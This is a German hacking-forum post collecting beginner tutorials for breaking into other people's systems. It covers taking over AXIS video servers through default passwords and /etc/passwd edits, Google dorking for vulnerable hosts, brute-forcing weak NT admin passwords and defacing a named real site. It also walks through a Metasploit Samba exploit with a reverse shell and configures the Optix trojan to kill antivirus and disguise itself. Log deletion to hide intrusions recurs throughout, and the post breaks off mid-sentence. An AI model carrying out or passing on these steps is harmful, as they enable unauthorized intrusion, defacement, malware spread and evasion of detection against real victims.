Nach einem kleinen Portscan finden wir heraus, dass der Server die TCP-Ports 21 und 80 offen hat. 80 ist der HTTP-Port über den wir und auf die Webseite mit unserem Browser verbinden. Aber da ist ja noch einer, der 21er =D Das ist der FTP-Port über den wir uns mit einem FTP-Client auf den FTP-Server verbinden können (klingt logisch, oder =P). Aber woher nehmen wir nun den Benutzernamen und das Passwort um uns auf den Server zu verbinden? Ich gehe jetzt mal davon aus, dass ihr euch mit dem Standartpasswort pass eingeloggt habt. Also haben wir doch Benutzername uns Passwort =) Für den Fall, dass ihr das Exploit benutzt habt, kennt ihr das root-Passwort aber nicht. Für euch geht’s dann erst mal weiter unten weiter. Ihr müsst euch erstmal einen Superuser erstellen, dann könnt ihr hier weitermachen.
Also ab auf den FTP mit root:pass
Geht in /etc/ rein und kopiert euch die Datei inittab auf die Festplatte. Diese öffnen wir jetzt mit dem Notepad... Aber was ist das? Alle Zeilenumbrüche sind weg. Das liegt daran, dass Linux/Unix für einen Zeilenumbruch das Zeichen LineFeed benutzt, MS jedoch LineFeed+CarriageReturn. Na dann holt ihr euch am besten Proton, ein Freeware Editor, der zusätzlich noch Syntaxhighlighting für fast alle Programmiersprachen bietet:
http://www.meybohm.de
Da unsere Datei jetzt auch korrekt angezeigt wird könne wir ja weiter machen =D Es ist an der Zeit Telnet auf dem Server anzuschalten. Dazu geht ihr in die Zeile '#telnet:3:respawn:/bin/telnetd' und löscht dort das #-Zeichen am Anfang der Zeile. Jetzt die Datei abspeichern und wieder auf den Server kopieren (die alte Datei natürlich überschreiben).
etzt nur noch im Web-Menü bei 'Video Server' auf 'Reset' klicken und den Serverneustart abwarten. Ein kleiner Portscan und schon können wir unseren Erfolg bewundern =) Port 23 ist offen. Jetzt am besten mit Putty (Telnet geht natürlich auch) auf den Server verbinden, Benutername + Passwort eingeben und schon sind wir der neue (in)offizielle Superuser auf dem Server. Das ganze System steht uns nun offen und wir können tun und lassen, was wir wollen =D
Hmmm, doch was ist das =) Eine Sash und keine Bash? Sash steht für Stand-Alone-Shell und ist eher eine funktionsarme Shell für kleine Recovery-Arbeiten. Aber egal, hauptsache r00t =D
how2become a Superuser
Falls ihr nicht über das Standartpasswort sonder über das Exploit auf den Server gekommen seid, habt ihr ein kleines Problem bei der Durchführung der obigen Schritte: Ihr habt kein Passwort um auf den FTP zu kommen. Wir könnten uns jetzt zwar einen neuen Benuter mit Admin-Rechten erstellen, aber zum Überschreiben der inittab brauchen wir Superuser-Rechte :/ Jetzt könntet ihr auf die Idee kommen, das root-Passwort zu ändern, was auch funktionieren würde. Aber ziemlich auffällig, oder ändert sich euer Passwort einfach so =P
Aber es gibt eine – vielleicht auch etwas verwinkelte ;) – Möglichkeit Superuser zu werden und das root-Passwort nicht (naja, ganz kurz) zu ändern. Also fagen wir an:
1. Neuen Benutzer mit vollen Rechten (Admin, Dial-Up und View) erstellen ('Video Server' -> 'Security')
2. Damit auf den FTP verbinden und die Datei /etc/passwd herunterladen
3. In dieser Datei eurem neuen User (in meinem Bsp. 'repair') die UID und GID 0 geben (Superuser) den zur Pfad zur Login-Shell von root übernehmen
4. jetzt über das Web-Menü das root-Passwort beliebig ändern
5. als root auf den FTP einloggen und die Datei /etc/passwd auf dem Server mit unserer neuen überschreiben
6. Fertig =D
Jetzt haben wir einen neuen Benutzer mit vollen Superuser-Rechten und root darf sein Passwort behalten =D
Logfiles
Aber p3pp3r, du hast die Logfiles vergessen =P
Jetzt gucken wir mal unter 'Video Server' -> 'Security' -> 'View Logfile' im Admin-Panel und was sehen wir da? Ein Log von unseren ganzen bösen Machenschaften? Ja =P
Ein steht wohl fest, diese Einträge müssen weg. Also weiter zum letzten Schritt, den Logfiles oder besser gesagt der Logfile. Denn in unserem Fall gibt es nur eine, die Datei '/tmp/var/log/messages'.
Der einfachste Weg ist sich auf den FTP einzuloggen und die Datei zu löschen. Man kann sie sich auch auf den PC laden, dort die Einträge mit der eigenen IP löschen und dann wieder hochladen. Doch in dem Moment, wenn man sich vom FTP-Server trennt, wir unsere IP wieder in die Logfile geschrieben =P
Also verbinden wir uns via Telnet auf den Server, gehen mit 'cd /tmp/var/log' in den Log-Ordner und löschen dort mit 'rm messages' die Logfile. Fertig =D
So, jetzt ist aber mal Schluss mit AXIS-Video-Server haXx0rn =P Falls ihr euch ein Advisory dazu angucken wollt, dann schaut mal auf:
http://www2.corest.com/common/showdoc.php?idx=329&idxseccion=10
Und hier noch die Hersteller-Anleitung, wie man den Telnet-Server anschaltet, falls ihr den Teil nicht so ganz verstanden habt.
http://www.axis.com/techsup/cam_servers/tech_notes/telnet_support.htm
Troubleshooting
Solltet ihr über Google keinen verwundbaren Server finden, dann guckt mal auf den Seiten weiter hinten nach. Ist doch logisch, dass die Server auf den ersten Seiten schon alle 'ausgelutscht' sind =P
Google-Hacking
Google ist nicht nur nützlich, wenn ihr irgendwelche Downloads oder Infos such, sondern ist das Hacker-Tool schlecht hin =D Jetzt fragt ihr euch sicherlich, wie das ganze funktionieren soll, aber keine Angst, es ist ganz einfach =P
Google bietet verschiedene Funktionen an, die ihr in eure Suche einbauen könnt, und damit ganz tolle Ergebnisse bekommt =D Also fangen wir mal an:
intitle:
Die intitle: Funktion such euch nur Webseiten mit einen bestimmten Titel raus. Die Suche nach 'intitle:Welcome' sucht euch zB. Nur Webseiten raus, die im Titel das Wort 'Welcome' haben.
inurl:
Die inrul: Funktion such alle Webseiten raus, die euer Suchwort in der URL beinhalten. So kommen wir mit einer Suche nach 'inurl:admin' zB. An alle Webseiten, die in ihrer URL das Wort 'admin' haben.
filetype:
Mit der filetype: Funktion könnt ihr bestimmen, dass nur Dokumente von einem bestimmten Dateityp durchsucht werden wollen. Die Suche nach 'filetype:c "Hello World"' liefert uns zB. Etliche C-Quellcode Dateien mit Hello-World Programmen.
site:
Die site: Funktion sucht uns nur Webseiten raus, die auf unseren Suchstring passen. 'site:edu' sucht uns zB. Alle .edu Domains heraus. Aber immer daran denken, dass die Suche von Rechts nach Links stattfindet. So würde eine Suche nach 'site=P3pp3r' keine Ergebnisse liefern. Eine Suche nach 'site=P3pp3r.de.vu' jedoch schon. Vielleicht etwas kompliziert erklärt, aber probiert einfach etwas rum =P
So, dass waren auch schon die wichtigsten Bonus-Suchfunktionen von Google. Jetzt liegt es an euch, diese Funktionen richtig zu kombinieren und so an 'wertvolle' Seiten zu gelangen.
Ich werde euch mal ein paar Denkanstöße geben =P
Suchen wir zB. Nach 'intitle:index.of inurl:admin' finden wir unzählige Seiten, die Index-Listing angeschaltet haben und dank inurl:admin finden wir uns dazu meistens in Ordnern mit dem vielversprechenden Namen admin wieder ;) Also schön stöbern, vielleicht ist ja was Interessantes dabei.
Eine Suche nach 'intitle:index.of "Apache/1.3.26 Server at"' liefert uns eine riesige Liste mit Servern, auf denen Apache 1.3.26 läuft.
Zu dieser Technik gibt es ein ausführliches ~30 Seiten langes Paper (in Englisch), das man sich unbedingt durchlesen sollte:
http://johnny.ihackstuff.com/security/premium/The_Google_Hackers_Guide_v1.0.pdf
Suchstrings, die solche wertvollen Informationen offenbaren wurden 'GoogleDorks!' getauft. Ein ziemlich große und täglich Wachsende Sammlung solcher GoogleDorks befindet auf http://johnny.ihackstuff.com. Dort finden wir zB. Den Suchstring 'aboutprinter.shtml'. Wenn wir danach suchen, finden wir einige ungesicherte Xerox Drucker, auf denen wir ohne jegliches Passwort Admin spielen können =P
Wie ihr seht machen GoogleDorks eine riesigen Spaß =D Das Problem ist nur, das öffentlich gepostete GoogleDorks ziemlich schnell ausgelutscht sind. Also immer auf dem neusten Stand bleiben oder noch besser: Selber welche suchen/finden.
Windows NT/2k r00ted (NTPW)
Hier werde ich mal auf eine Methode eingehen, die oft in der c00len h@xX0r Szene benutzt wird um an Space für Filme/Apps/Mp3's/etc. zu kommen. Wir bedienen uns der Möglichkeit sich auf andere NT/2k Server über den 'NetBios Session Service' (Port 139) einzuloggen. Dazu brauchen wir natürlich einen passenden Benutzernamen und ein dazugehöriges Passwort.
Jetzt sind einige Admins aber relativ faul und benutzen Passwörter wie 'asdfgh' oder noch besser gar keins =D Also sollte unserem Vorhaben nichts mehr im Wege stehen =P
time2scan
Zuerst sucht ihr euch eine IP-Range aus und scannt nach offenen 139er Ports. Das ist der Port über den wir unseren Angriff durchführen werden. Um unbrauchbare IP's herauszufiltern könnte ihr die gescannten Server noch mal auf Port 80 scannen und gucken ob sie einen Webserver am laufen haben (was wir natürlich wollen, was sollen wir mir irgendwelchen Home-PC's =P). Aber der zweite Scan ist optional =D
Jetzt braucht ihr 'X-Scan 2.3'. Auf keinen Fall Version 3.0 oder 3.1, da dort das NTWP-Modul nicht richtig funktioniert. Also X-Scan starten, bei Config -> Scan module das 'NT-Server-Password' Modul auswählen und unter Config -> Scan parameter mit 'Load host list from file' unsere gescannten Sever laden. Jetzt nur noch auf File -> Start klicken und der Scan beginnt =D Je nachdem wie viele Hosts ihr in eurer Liste habt kann das ganze mehr oder weniger lange dauern. Wenn X-Scan fertig ist, öffnet sich normalerweise automatisch das LOG, was hoffentlich ca. so aussieht:
Wir haben also einen Administrator mit dem Username 'jfernando' und der Username ist auch gleichzeitig sein Passwort =D Das ist schlecht für ihn und gut für uns =P Solltet ihr keinen Admin-Account gefunden haben, müsst ihr wohl oder übel noch mal scannen (aber eine andere Range =D). Weiter geht der Spaß mit 'DameWare NT-Utilities' von www.dameware.com.
DameWare
Startet das Programm und macht einen Rechtsklick auf Non-Browsable Machnies -> Add Machine…, tippt die IP vom Rechner mit dem 'weak pasword' ein und klickt auf 'OK'.
Wenn alles geklappt hat ist es jetzt an der Zeit unseren Benutzernamen und Passwort einzutippen, was wir natürlich auch machen. Willkommen Mr./Mrs. Administrator =D
Links haben wir jetzt eine wunderschöne Auswahl, was wir alles auf dem Server machen können. Die Palette der Möglichkeiten ist extrem groß =D
Aber wir werden uns jetzt einfach mal auf's defacen beschränken. Normalerweise sind die Dateien vom Webserver im Verzeichnis 'C:\Inetpub', aber in unserem Fall ist es der Ordner 'C:\WWW.INSISTEMAS.ES' (da hätte ich die IP vom Server auch nicht weg-X-en müssen =P). Gehen wir also in den besagten Ordner und kopieren uns die index.html auf die Festplatte. Jetzt das ganze mit dem Notepad öffnen und nach den eigenen Vorlieben editieren =D
Wir ändern einfach nur den Titel der Webseite, der sich logischerweise im <title> Tag befindet =P Nach unserer kleinen Änderung laden wir die index.html wieder auf den Server und besuche die URL um unser Werk zu betrachten =P
So, das war auch schon die ganze Kunst des NTPW-Hackens. Ihr könnt mit den DameWare Utilities natürlich auch einen FTP-Server aufsetzen und schon habt ihr einen kewlen stro (scheiß Wort =D) oder andere Sachen machen.
Logfiles
Aber p3pp3r, du hast die Logfiles vergessen =P
Dazu klickt ihr in den DameWare Utilities auf 'Eventlog'. Danach wählt ihr nacheinander die Spalten 'Application', 'Security' und 'System' aus und klickt danach immer auf das rote X-Symbol im Fenster. So löscht ihr alle 3 Logfiles. Fertig =D
Retina
Retina ist ein ziemlich guter Security-Scanner, der Server nach Sicherheitslücken absucht. Ihr bekommt das ganze entweder bei eEye persönlich oder falls euch das nötige Kleingeld fehlen sollte bei so ziemlich allen Tauschbörsen. Zu bedienen ist das ganze auch relativ simpel:
Zuerst müsst ihr links auf 'Scanner' klicken, dann müsst ihr oben die IP eintragen und jetzt nur noch auf Enter drücken und der Scan beginnt. Die Standart-Einstellungen sollten für euch eigentlich reichen =P Wenn Retina fertig ist könnte es zB. So aussehen:
Nun haben wir eine kleine Auswahl an Sicherheitslücken, die wir ausnutzen könnten um den Server zu r0XxX0rn =D Wenn ihr auf einen Listeneintrag klickt kommt unten meist auch eine kleine Beschreibung und ein wertvoller Bugtraq-Link =P
Dort können wir uns dann weitere Info's und ggf. ein Exploit holen.
So, leicht es bis jetzt sein mag, zum r00t ist es noch ein weiter weg. In unserem Beispiel hab ich mich nach etwas durchwühlen der möglichen Schwachstellen für einen Fehler im trans2open Modul des Samba-Server entschieden =D
Ein Samba-Server ist übrigens dafür zuständig, dass Windows und Linux Systeme in einem Netzwerk Daten austauschen können, aber das interessiert sicher keinen von euch =P
Wie man diese Sicherheitslücke nun ausnutzt findet ihr unter 'Metasploit Framework – trans2open Exploit'.
Metasploit Framework – trans2open Exploit
Das Metasploit Framework beinhaltet verschiedene Exploits und Payloads und lädt somit zum experimentieren ein. Hier mal ein kleines Zitat von der offiziellen Webseite (www.metasploit.com), wo ihr das Programm auch herunterladen könnt:
This is the Metasploit Project. The goal is to provide useful information to people who perform penetration testing, IDS signature development, and exploit research. This site was created to fill the gaps in the information publicly available on various exploitation techniques and to create a useful resource for exploit developers. The tools and information on this site are provided for legal penetration testing and research purposes only.
Dann lasst uns beginnen =D Zuerst brauchen wir einen Server, der eine passende Schwachstelle zu den bereitgestellten Exploits hat. Diesen haben wir mit Retina gefunden und werden ihn gleich mal r00ten =P Also startet das Metasploit Framework
Wie ihr seht ist das ganze Programm Konsolen-basierend und um es richtig zu verstehen solltet ihr euch am besten die beiliegende .pdf File anschauen.
Als erstes lassen wir uns mit 'show exploits' eine liste alle Exploits anzeigen, die das Framework an Bord hat. Und da sehen wir auch schon ein Exploit für den trans2open Fehler im Samba-Server, den wir mit Retina gefunden haben. Um mehr Informationen zu bekommen tippen wir 'info exploit samba_trans2open' ein und lesen ein wenig =D
Wir entscheiden uns jetzt mit 'use samba_trans2open' für das Exploit und schauen uns dann mit 'show options' alle Parameter an, die es benötigt. Im moment ist das nur der Remot-Host, also der Server, den wir angreifen wollen. Mit 'set RHOST 123.123.123.123' legen wir diesen fest. Der Remote-Port ist normalerweise 139 und wir können die Einstellungen so belassen. Falls der Samba-Server auf einem anderen Port laufen sollte einfach mit 'set RPORT 149' den neuen Port festlegen.
So, jetzt könnten wir den Server theoretisch exploiten. Aber was soll dann für ein Code auf dem Server ausgeführt werden? Das Exploit nutzt erst mal nur die Sicherheitslücke aus. Dann muss aber noch 'böser' Code eingeschleust werden. Dieser wird im Metasploit Framework Payload genannt. Mit 'show payloads' lassen wir uns die verschiedenen Payloads anzeigen.
Wollen wir zu einem Payload mehr Informationen haben, tippen wir einfach 'info payload linx86reverse_xor'. Nach dem Durchlesen entscheiden wir uns für diesen Code, das passiert, wenn wir 'set PAYLOAD linx86reverse_xor' eintippen.
Dieser Payload verbindet sich wieder auf unseren PC zurück und wir erhalten eine verschlüsselte Shell. Dies hat den Sinn, dass wir so eine Firewall umgehen (falls auf unserem Opfer vorhanden) und uns durch die Verschlüsselung wie echte Ninja-Profi-Hacker fühlen dürfen =D
Wenn wir jetzt erneut 'show options' eingeben, sehen wir, dass wir zusätzlich noch den Local-Host und Port definieren müssen (fur die 'rückverbindungsshell'). Das machen wir mit 'set LPORT 1337' und 'set LHOST unsereip'.
Jetzt fehlt nur noch eine Kleinigkeit. Mit 'show targets' bekommen wir alle möglichen Zielsysteme angezeigt. Wie wir sehen ist das Exploit für Linux und FreeBSD geeignet. Mit 'set TARGET 0' entscheiden wir uns in unserem Fall für Linux.
Jetzt nur noch 'exploit' eintippen und los geht's =D
Nach etwas Brute-Force um den richtigen Offset zu finden sind wir auf dem Server und der Befehl 'id' verrät uns auch, das wir r00t sind. Ist das nicht schön =D
Wenn ihr jetzt noch einigermaßen mit der Linux-Shell umgehen könnt, wünsche ich euch viel Spaß auf dem Server =P
find some targets
Ziele für einige der Exploits in Metasploit findet ihr mit dem Tool sfind. sfind ist ein kleiner konsolenbasierender Scanner, den es in einer 100, 500 und 1000 Threads-Version auf vielen Websites zum Download gibt.
Nmap
Nmap (www.nmap.org/nmap) ist wohl der bekannteste (und vielleicht auch beste) Portscanner überhaupt. Heisec hat ein schönes Paper über die Möglichkeiten veröffentlicht, die uns dieses Programm bietet. Also dann, fröhliches Scannen =D
[quelle:www.heisec.de]
Portscanner gibt es wie Sand am Meer; der Rolls Royce unter ihnen ist immer noch nmap. Mittlerweile gibt es auch ein grafisches Frontend, viele wichtige Scan-Optionen lassen sich aber weiterhin nur auf der Kommandozeile nutzen. Das Programm läuft auf den meisten Unix-Varianten sowie unter Windows und bietet eine ganze Reihe von verschiedenen Scans an.
Klopf, Klopf!
Im einfachsten Fall ruft man nmap mit der IP-Adresse oder dem Namen des zu testenden Systems auf. Das kann der eigene Webserver oder die Internet-Adresse des Routers sein. Letzters erfolgt sinnvollerweise von außen, im Zweifelsfall testet man vom Rechner eines Freundes aus. Schon dieser einfache so genannte TCP-Connect-Scan liefert oft interessante Ergebnisse. Er nutzt die normalen System-Funktionen und kommt mit normalen Benutzerrechten aus.
Ein Port kann sich nach Lesart von nmap neben "open" auch im Zustand "filtered", "closed" oder "unfiltered" befinden.
beachnet:~# nmap -P0 www.hackmee.com
(The 1551 ports scanned but not shown below are in state: closed)
Port State Service
22/tcp filtered ssh
80/tcp open http
443/tcp open https
"open" zeigt an, dass ein Port erreichbar ist und auch einen echte Verbindung möglich war. Nmap absolvierte einen kompletten 3-Wege-Handshake: Es schickte ein SYN-Paket, erhielt als Antwort vom Server ein SYN/ACK und bestätigte dieses mit einem abschließenden ACK, das die Verbindung herstellt. Auf diesem Weg konnte nmap den Webserver von hackmee.com über Port 80 und 443 erreichen.
Ein Port im Zustand "filtered" bedeutet, dass der Scanner auf einen Verbindungsversuch überhaupt keine Antwort erhalten hat. Das lässt darauf schließen, dass eine Firewall die Verbindungsversuche auf Port 22 blockiert, indem sie ohne viel Aufhebens und ohne Benachrichtung ankommende Pakete einfach verwirft. Man spricht hier auch von einer DROP-Regel.
Ist eine Filterregel auf REJECT gesetzt, so sendet die Firewall höflicherweise eine ICMP-Fehlermeldung "Port unreachable". Erhält nmap solch eine Antwort, stuft es den Port ebenfalls als "filtered" ein. Auf den meisten Firewalls ist aber DROP die bevorzugte Aktion, da das Wegwerfen von Paketen für einen Portscanner genauso aussieht, als wäre das Zielsystem nicht existent. Die Firewall kann somit sich und das dahinter liegende Netz tarnen -- was natürlich nur funktioniert, wenn nicht wie im obigen Beispiel Ports offen sind.
Meldet nmap die Mehrzahl der Ports im Zustand "filtered", so verwirft die Firewall offenbar alle Pakete, für die keine expliziten Regeln definiert sind. Der Betreiber erspart sich damit die zusätzlichen Antwort-Pakete, dass der Dienst nicht verfügbar ist und verringert somit seine Netz- und Serverlast.
Im Beispiel deklariert nmap restlichen standardmäßig überprüften 1551 Ports jedoch als "closed". Das heißt, die Firewall ließ die Verbindungsanfragen durch und der Server antwortete TCP/IP-konform mit einem RST-Paket, weil auf diesem Port kein Dienst erreichbar war.
Doch bereits diese einfachen Scans bergen einige Fallstricke, die zu falschen Schlüssen verleiten können. So bedeutet die Tatsache, dass nmap keine offenen Ports findet, nicht zwangsläufig, dass der Server völlig dicht ist. nmap testet per Default nur die so genannten well-known Ports zwischen 1 bis 1024 sowie die zusätzlich in der Datei nmap-services aufgeführten. Um alle TCP-Ports zu untersuchen, muss der Anwender über die Option -p den Bereich 1-65535 angeben.
Eine weitere Fehlerquelle, die zum Abbruch eines Scans führt, sind Systeme, die nicht auf Ping-Anfragen (ICMP-Echo-Requests) antworten. nmap überprüft nämlich vor jedem Scan die Erreichbarkeit des Systems mit einem Ping-Paket und bricht ab, wenn keine Antwort zurückkommt. Die Option -P0 unterdrückt diesen Test.
Lautlos
Die Connect-Scans sind sehr auffällig und werden schnell erkannt, tauchen sie doch in Log-Dateien oder etwa in der netstat-Ausgabe von Betriebssystemen auf. Weniger "Lärm" machen SYN-Scans (-sS), die nur die ersten zwei Schritte des Verbindungsaufbaus durchführen. Statt des abschließenden ACK-Pakets sendet nmap ein RST, um den Vorgang abzubrechen. Damit ist zwar keine vollständige Verbindung zustande gekommen, aus der Antwort des Zielsystems ist dennoch der Status des Ports ersichtlich und die "halb-offene" Verbindung taucht nicht in normalen Log-Dateien auf. Diese Scans erfordern allerdings Administrator-Rechte auf dem Scan-System, da nmap dazu keine Systemfunktionen nutzen kann sondern die Pakete "von Hand" zusammenbaut und über einen so genannten Raw Socket verschickt.
Da moderne Betriebssyteme und Firewalls auch SYN-Scans registrieren, bietet nmap weitere Scan-Methoden zur Verschleierung eines Scans. Mit FIN-, Null- und XMAS-Scans lassen sich die Flags in TCP-Paketen manipulieren, um ein Zielsystem auszutricksen und zu unerwarteten Antworten zu bewegen. Oft erhält man aber fehlerhafte Ergebnisse, in denen offene Ports als geschlossen oder gefiltert angezeigt werden und anders herum.
Allerdings kann ein Anwender über die richtige Interpretation Rückschlüsse auf den Regelsatz einer Firewall ziehen oder sogar ein System enttarnen, das versucht sich zu verstecken. Ist ein Rechner etwa nur für bestimmte Netze über SSH erreichbar und antwortet nicht auf Pings, ergibt ein SYN-Scan folgendes Ergebnis:
beachnet:~# nmap -sS -P0 www.hackmee.com -p 22
Port State Service
22/tcp filtered ssh
Damit weiß man jedoch immer noch nicht, ob das System wirklich vorhanden ist, denn "filtered" heißt ja eigentlich so viel wie "keine Antwort bekommen". Stateful-Inspection-Firewalls blocken zwar SYN oder SYN/ACK-Pakete, lassen aber oft FIN- und ACK-Pakete passieren, auf die das angesprochene System dann antwortet.
beachnet:~# nmap -sF -P0 www.hackmee.com -p 22
The 1 scanned port on www.hackmee.com (192.168.0.1) is: closed
Nmap zeigt den Port jetzt als "closed" an, woraus sich ableiten lässt, dass der untersuchte Rechner ein RST-Paket gesendet haben muss -- damit hat er sich verraten. Ähnlich funktioniert der ACK-Scan auf einen Port: Kommt ein RST-Paket zurück, so hat der Rechner hinter der Firewall reagiert. nmap gibt als Ergebnis "UNfiltered" aus.
Extras
Ein kompletter Scann aller Ports oder gar eines ganzen Netzes dauert unter Umständen recht lang. In schnellen Netzen kann man diesen Vorgang aber deutlich beschleunigen:
beachnet:~# nmap -sA -P0 -T aggressive 10.0.0.0/8 -p 22
The 1 scanned port on www.hackmee.com (192.168.0.1) is: Unfiltered
Im aggressive-Modus wartet nmap nicht so lange auf ausstehende Antworten.
Neuere DSL-Router versuchen Portscans zu erkennen und sperren die Absenderadresse für einen gewissen Zeitraum. Das verfälscht unter Umständen auch die Ergebnisse eines Selbsttests. "sneaky" beziehungsweise "paranoid" verteilen die Scans über einen langen Zeitraum, um die Erkennung durch Intrusion Detection Systeme zu vermeiden.
Gefährlich werden die automatischen Sperren der Router, wenn der Angreifer die Absenderadresse des Portscans fälscht. Ein vorgetäuschter Angriff wie
# nmap -e eth0 -sS -S dns1.provider.com -P0 router.hackmee.com
hat schon in einigen Tests den Name-Server und damit den Zugang ins Internet für alle Anwender hinter dem Router gesperrt.
Um die Quelle eines Portscans zu verschleiern, aber trotzdem dessen Ergebnisse zu erhalten, setzen Angreifer oft die Decoy-Funktion (-D) ein. Mit ihr kann er zusätzliche IP-Adressen angeben, die scheinbar ebenfalls Portscans durchführen. Welcher Rechner wirklich hinter dem Test steckt, kann das Opfer nicht erkennen
Tarnkappe
Mit Idle-Scans (-sI) lassen sich sogar Scans quasi über Bande durchführen -- ohne mit dem eigentlichen Zielsystem zu kommunizieren. Dabei benutzt man einen weiteren Rechner (Idle-Host) im Netz und sendet mit dessen Absenderadresse Pakete an einen Port des Zielsystems. Durch die Auswertung der IP-IDs des Idle-Host erkennt man, ob auf dem Zielsystem der Port offen oder geschlossen war [3].
Mit der Option -O kann nmap das Betriebssystem des untersuchten Rechners ermitteln. Dies geschieht anhand von feinen Unterschieden, wie der jeweilige TCP/IP-Stack auf bestimmte Kombinationen von Flags und Optionen reagiert, die eine Art von Fingerabdruck ergeben. Erfahrungsgemäß liegt der Scanner mit seinem Tipp sehr oft richtig; so genannte Honeypots wie honeyd verwenden jedoch dieselbe Fingerabdruckdatenbank wie nmap, um dem Scanner ein beliebiges System vorzutäuschen.
Wortkarg
Eine Reihe von Diensten wie TFTP oder SNMP lauscht statt auf TCP auf UDP. nmap unterstützt auch solche Scans, allerdings sind die Ergebnisse -- Protokoll-bedingt -- äußerst fehlerträchtig und unzuverlässig. Zudem können sie elend lange dauern, da nmap sicherheitshalber zwei Pakete sendet und jeweils auf einen Timeout warten muss. Scans über alle 65535 UDP-Ports können sich über Tage hinziehen.
beachnet:~# nmap -sU -P0 www.verysecure.com -p 161
Port State Service
161/udp open snmp
Das verbindungslose UDP kommt ohne Handshake aus; auch Bestätigungen für Pakete erhält man vom Empfänger nicht. Dafür muss die darauf aufsetzende Applikation sorgen. Nmap sendet zum Test ein UDP-Paket ohne Inhalt und geht beim Ausbleiben einer Antwort davon aus, das der Port offen ist. Allerdings kann die Anfrage auch von einer blockierenden Firewall geschluckt worden sein. Bei einem komplett dichten System meldet nmap deshalb fälschlicherweise alle Ports als offen. Ob etwa der SNMP-Dienst tatsächlich erreichbar ist, muss man mit einem Tool wie snmpwalk nachprüfen.
Einige Systeme signalisieren geschlossene UDP-Ports mit einem ICMP-Paket "Port unreachable", was nmap dann richtig als "closed" anzeigt. Relativ selten erhält man als Ergebnis einer Suche nach offenen UDP-Ports auch mal ein "filtered". Dann hat ein Paketfilter zugeschlagen, der statt eines "Port unreachable" ein "Host unreachable -- admin prohibited filter" zurücksendet.
Schwarz oder Weiß
An Nmap haben sich schon viele heiße Diskussionen entzündet. Das Programm ist ein mächtiges Werkzeug, das für den Netzwerkadministrator genauso unverzichtbar ist wie für den Security-Consultant. Es verrät ihm, wo die Schwachstellen seiner Server und Netze liegen, damit er gezielte Gegenmaßnahmen einleiten kann. In den falschen Händen mutiert es jedoch zu einem genauso mächtigen Angriffs-Tool. Ein Portscan fremder Systeme wird von vielen Internet-Nutzern als "unfreundlicher Akt" eingestuft. Er ist nach deutschem Recht zwar nicht strafbar, kann aber durchaus gegen die Allgemeinen Geschäftsbedingungen des Providers verstoßen und bei Beschwerden die Kündigung des Vertrags zur Folge haben. Man sollte solche Scans also nur gegen die eigenen Systeme oder im Einverständnis mit dem Eigentümer durchführen. (dab)
[/quelle:www.heisec.de]
Optix 1.32 – Server bauen, stealthen, packen (by Boreas)
Ein Hallo an alle Verzweifelten, die einen guten Server erstellen wollen. Ich habe dieses Tut für diejenigen geschrieben, die gerade mit Hacking & Security anfangen wollen und habe versucht es möglichst einfach zu beschreiben. Falls ihr etwas nicht versteht könnt ihr mich (fast) immer in ICQ erreichen (221604215).
So jetzt zum Tut:
1. Zuerst downloadet ihr euch (falls noch nicht geschehen) Optix Pro 1.32 von www.evileyesoftware.com , entpackt die Ordner und startet die Builder.exe (möglicherweise kommt so ein Fenster, in dem ihr einen Code eintragen müsst (Code im Text), den braucht ihr allerdings nur einmal eingeben).
2. Danach geht ihr auf Builder Settings->Language und wählt eine Sprache (Deutsch: Builder_German.ini).
3. Begebt euch zu Grund- Einstellungen->Allgem. Infos. IP- und Benachrichtigungstrennzeichen, sowie den Inhalt der Benachrichtigung lasst ihr, wie sie sind. Bei Server-Name könnt ihr einen beliebigen Namen eingeben, der bei der Benachrichtigung (Notify) erscheint. Den Server- Port solltet ihr so eingestellt lassen, wenn ihr nicht wisst, was das ist. Server- Passwort solltet ihr vergeben, damit kein anderer durch sog. "Scanner" (ein Programm, das nach infizierten Systemen sucht) in euer System gelangt. Die Fehlermeldung solltet ihr auslassen, weil wir den Server noch binden wollen (ein anderes Programm anhängen, was von dem Trojaner ablenken soll).
4. Server- Icon: Nehmt einfach Default Setup, da wir das Icon später noch ändern werden.
5. Autostart & Installation->Autostart: Bei 2k/XP Systemen könnt ihr noch die RunServices Startmethode auswählen, bei 9x/ME Systemen win.ini und system.ini (steht auch beides dahinter). Sub7- Methode kann ich nicht empfehlen, denn dadurch können schäden am System hervorgerufen werden. Autostart- Methode heißt einfach nur, wie der Server gestartet werden soll (wenn der PC heruntergefahren und neugestartet wird). Registry - Run solltet ihr immer eingeschaltet haben. Falls ihr alles deaktiviert, startet der Trojaner nach einem Neustart nicht.
6. Datei Infos: Hier könnt ihr einen Dateinamen für euren Server einstellen. Nehmt z.B. i1sass.exe. Falls jmd. in den Taskmanager schaut, fällt es ihm vielleicht nicht so sehr auf, wie msiexec16.exe (ilsass.exe ist ein Systemprozess). P.S.: Nehmt nicht den genauen Namen eines Systemprozesses, da dieser im Normalfall beendet wird (auch wenn er danach möglicherweise neugestartet wird => auffällig). Den Rest solltet ihr so lassen, wie er ist.
7. Nun zu den Benachrichtigungen. ICQ, MSN und SMTP funktionieren bei mir nicht oder nicht zuverlässig genug. Empfehlen kann ich lediglich die CGI- Notify. Diese werde ich hier allerdings nicht besprechen, Sucht euch einfach ein CGI-Notify-Tut.
8. FW & AV Manipulation: Aktiviert AV- Programme UND Firewalls. Den Rest lasst ihr ausgeschaltet. In den Unterbereichen EXE- Namen und NT/2k/XP- Dienste könnt ihr noch Namen eintragen. Diese Programme/Dienste werden beim Start des Trojaners dann beendet (ihr braucht den genauen EXE- oder Dienstnamen).
9. Drückt auf => Server erstellen <=, wählt ein Verzeichnis und denkt euch einen Namen für die *.exe. Danach fragt euch Optix, ob ihr die Server.exe mit UPX packen wollt. Klickt auf OK ohne Packen, weil wir den Server ja noch modifizieren wollen.
10. Jetzt kommen wir zu dem Modifizieren. Startet Resource Hacker (wenn ihr es nicht habt, einfach googlen) und wählt File->Open->Servername.exe. Jetzt müssten kleine Ordner erscheinen (in Resource Hacker) von Cursor bis Icon Group.
Da man die ganzen Cursor gar nicht braucht, kann man sie alle löschen (Ordner "öffnen" und jeden löschen).
Icon, Icon Group und String Table interessieren uns jetzt nicht. Interessant sind: RCData->TIMG->0 und RCData->TSVRFORM->0. Diese Abschnitte sind lesbar und man kann sie einf
Mit folgendem Code, können Sie den Beitrag ganz bequem auf ihrer Homepage verlinken
Weitere Beiträge aus dem Forum Newcomer - Board
blacklisted ips? - gepostet von Megabyte am Dienstag 09.01.2007
Hallo an die Runde - gepostet von sebuka am Mittwoch 21.03.2007
Ähnliche Beiträge wie "Hackerbibel"